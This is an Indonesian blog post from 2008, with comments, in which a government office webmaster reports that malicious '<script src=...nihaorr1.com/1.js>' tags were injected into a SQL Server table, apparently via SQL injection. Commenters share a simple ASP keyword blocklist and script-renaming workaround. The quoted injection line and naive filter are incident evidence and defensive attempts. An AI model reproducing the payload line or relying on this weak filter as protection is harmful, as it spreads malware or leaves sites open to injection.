29 April 2008   Blog, Pindahan dari Multiply   1 Comment

Bagaimana Mengatasi Serangan “Nihaorr1”?

Pindahan dari Multiply

URL: http://webkppn.multiply.com/journal/item/5/Bagaimana-Mengatasi-Serangan-Nihaorr1

nihaorr1.png
Belum setengah jam yang lalu saya melihat hal aneh di halaman download website KPPN Khusus Banda Aceh. Anehnya, setiap baris terasa lama dalam menampilkannya karena harus “menanti hubungan” dengan nihaorr1.com. Wah! Apa ini? Karena penasaran, saya mencoba membuka http://www.nihaorr1.com. Ternyata Mallware Warning di komputer saya bilang begini, “Warning – visiting this web site may harm your computer!

Saya lihat script di “download.asp” tidak ada yang aneh. Oh, ternyata biang keroknya ada di dalam tabel “download” yang ada di database SQL Server. Ada sisipan “<script src=http://www.nihaorr1.com/1.js></script>” di setiap baris pada kolom “deskripsi.” Selama ini SQL Server memang dipakai website untuk menampung database laian-lain, selain SP2D. Yang jadi pertanyaan, kenapa si Nihaorr1 ini bisa menyusup ke database SQL Server? Apa yang salah? Apakah ini ada kaitannya dengan script koneksi ke SQL Server yang mungkin terlalu sederhana? Lihat:
set conumum=Server.CreateObject(“ADODB.Connection”)
conumum.Open “Provider=SQLOLEDB.1;Persist Security Info=True;User ID=xxxx;Initial Catalog=xxxx”

Sejauh ini yang ketahuan baru tabel “download.” Tidak menutup kemungkinan, serangan akan menjalar ke tabel-tabel lain. Waduh, gimana nih ya?

Mungkin di sini ada pemecahannya, tapi saya belum baca:
http://forums.iis.net/p/1148917/1867511.aspx

One Response to Bagaimana Mengatasi Serangan “Nihaorr1”?

  1. aa_haq says:
    1 November 2012 at 19:46

    jamurkuping wrote on Apr 30, ’08

    mas.. itu berarti udah ada orang yang berhasil masuk ke sistem…
    soalnya, nambah script secara langsung itu salah satu bukti adanya serangan langsung

    ahmadabdulhaq wrote on Apr 30, ’08, edited on Apr 30, ’08

    Saya pikir, inilah bahayanya SQL injection. Pagi ini saya menambahkan script di “general.asp” sebagai berikut:

    if IllegalChars(Request.ServerVariables("QUERY_STRING")) then
    	response.write "<h1><font color="red">Sepertinya Anda sengaja memasukkan karakter " & _
    		"yang menakutkan bagi server kami. " & _
    		"Coba hubungi <a href="http://ahmadabdulhaq.multiply.com">webmaster</a>."
    	response.end
    end if</font></h1>

    Ini cukup untuik mencegah variabel yang biasa dipakai untuk melakukan SQL injection. O ya, fungsi IllegalChars isinya adalah sebagai berikut:

    'Function IllegalChars to guard against SQL injection
    Function IllegalChars(sInput)
    	'Declare variables
    	Dim sBadChars, iCounter
    	'Set IllegalChars to False
    	IllegalChars=False
    	'Create an array of illegal characters and words
    	sBadChars=array("select", "drop", "insert", "delete", "--", ";")
    	'Loop through array sBadChars using our counter & UBound function
    	For iCounter = 0 to uBound(sBadChars)
    		'Use Function Instr to check presence of illegal character in our variable
    		If Instr(sInput,sBadChars(iCounter))>0 Then
    			IllegalChars=True
    		End If
    	Next
    End function

    Comment deleted at the request of the author.

    ahmadabdulhaq wrote on May 16, ’08

    Aduh, itu hacker Cina menyerang lagi. Ketahuannya tadi pagi pas saya buka halaman download. Kali ini bukan nihaorr1.com, tapi wow112.cn. Script yang dijalankan: http:// http://www.wow112. cn/m.js (tanpa spasi). Berarti bukan cuma SQL injection dong penyebabnya?

    Untuk mengantisipasinya, saya baru lakukan replace di script ASP untuk mengganti kata-kata “script” dengan “scriptx”. Hasilnya, script m.js itu bisa tidak berjalan.

    Saya masih bingung….. 🙁

    ahmadabdulhaq wrote on May 16, ’08

    jamurkuping, kamu pernah sarankan ini ‘kan?: “periksa seluruh LOG koneksi. terutama koneksi dari luar.”r>Caranya bagaimana ya?

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *